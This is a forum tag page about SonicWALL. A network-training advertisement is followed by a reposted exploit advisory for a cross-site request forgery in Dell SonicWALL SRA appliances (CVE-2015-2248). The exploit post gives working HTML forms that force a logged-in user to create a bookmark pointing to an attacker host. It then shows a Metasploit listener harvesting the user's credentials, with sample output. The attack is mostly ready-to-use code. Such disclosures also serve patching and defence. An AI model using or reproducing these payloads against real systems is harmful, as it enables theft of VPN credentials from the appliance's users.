Search the Community
Showing results for tags 'sonicwall'.
-
Pentru cei interesati de niste training, inafara de Udemy si alte site-uri. Why does RouteHub exist? To make affordable, practical network training available to all network engineers How does RouteHub do this? The founder of RouteHub identified a need for practical training for network engineers. Prior to the inception of RouteHub, the only network training that was readily available focused on certifications. This type of training has value and its place, but he saw a need for training that would help network engineers quickly get a solution in place in real-life situations. He decided that the quickest way to provide this training to the most number of people possible would be to create training documents and videos, and distribute them over the internet. What is available? RouteHub provides practical training in areas such as: Core Network Services (Routing, Switching, IPv6, Multicast, QoS) Voice and Unified Communications Security (Firewall, VPN, UTM) Wireless Data Center (Virtualization, Tunneling) Small Business Starting Out Network Design Why RouteHub instead of other online Training Videos? Our training videos provide practical, real-world training, to help you devise and deploy solid networking solutions. We’re not here to help you answer a multiple-choice test. We’re here tell you what you need to do to get a network up and running, how to configure different technologies, and to help you really understand how it works. Who works at RouteHub? RouteHub was founded by Michel Thomatis, a network engineer with 15 years of experience. He has worked for several companies over the years, developing network solutions to meet the needs of the businesses. Over the years, Michel found that he really enjoyed teaching people interesting in networking how it all works, and decided to do that full time. He is committed to providing you the training you need to be a successful network engineer. http://routehub.net/training/ Spor la invatat!
-
- 1
-
- training
- cisco training
- (and 5 more)
-
# Exploit Title: Dell SonicWALL Secure Remote Access (SRA) Appliance Cross-Site Request Forgery # Date: 04/28/2015 # Vendor Homepage: www.dell.com # Version: Dell SonicWALL SRA 7.5 prior to 7.5.1.0-38sv and 8.0 prior to 8.0.0.1-16sv # CVE : 2015-2248 Exploitation Procedure (Outline): 1. Use CSRF to force currently logged in user to create a bookmark pointing to an endpoint controlled by the attacker. 2. Use subsequent request to call the bookmark just created. The identifier of the bookmark can be bruteforced using a single decrementing integer and causes minimal time delay. 3. Gather the credentials on the target server provided in step #1 1. Create a bookmark: <html> <body> <form action="https://vulnerable.vpn-installation.tld/cgi-bin/editBookmark" method="POST"> <input type="hidden" name="bmName" value="foo" /> <input type="hidden" name="host" value="www.malicious-host.tld" /> <input type="hidden" name="description" value="bar" /> <input type="hidden" name="tabs" value="Baz" /> <input type="hidden" name="service" value="HTTP" /> <input type="hidden" name="fbaSSOEnabled" value="on" /> <input type="hidden" name="fbaSSOFormUserName" value="user" /> <input type="hidden" name="fbaSSOFormUserPassword" value="password" /> <input type="hidden" name="MC_App" value="inherit" /> <input type="hidden" name="MC_Copy" value="inherit" /> <input type="hidden" name="MC_Print" value="inherit" /> <input type="hidden" name="MC_Offline" value="inherit" /> <input type="hidden" name="name" value="name" /> <input type="hidden" name="type" value="type" /> <input type="hidden" name="owner" value="owner" /> <input type="hidden" name="cmd" value="add" /> <input type="hidden" name="wantBmData" value="true" /> <input type="hidden" name="ok" value="OK" /> <input type="submit" value="Submit request" /> </form> </body> </html> 2. Call the newly created bookmark This might require some guesswork, because we don't know which value bookmarkAccessed needs to have. <html> <body> <form action="https://vulnerable.vpn-installation.tld/cgi-bin/http"> <input type="hidden" name="HOST" value="www.malicious-host.tld" /> <input type="hidden" name="bookmarkAccessed" value="4" /> <input type="submit" value="Submit request" /> </form> </body> </html> 3. Set up a listener E.g. metasploit payload use auxiliary/server/capture/http_basic msf auxiliary(http_basic) > [*] Listening on 0.0.0.0:80... [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://www.malicious-host.tld:80/ [*] Server started. [*] vulnerable.vpn-installation.tld http_basic - Sending 401 to client vulnerable.vpn-installation.tld [+] vulnerable.vpn-installation.tld http_basic - vulnerable.vpn-installation.tld - Credential collected: "user:password" Surs?: http://dl.packetstormsecurity.net/1505-exploits/dellsonicwallsra-xsrf.txt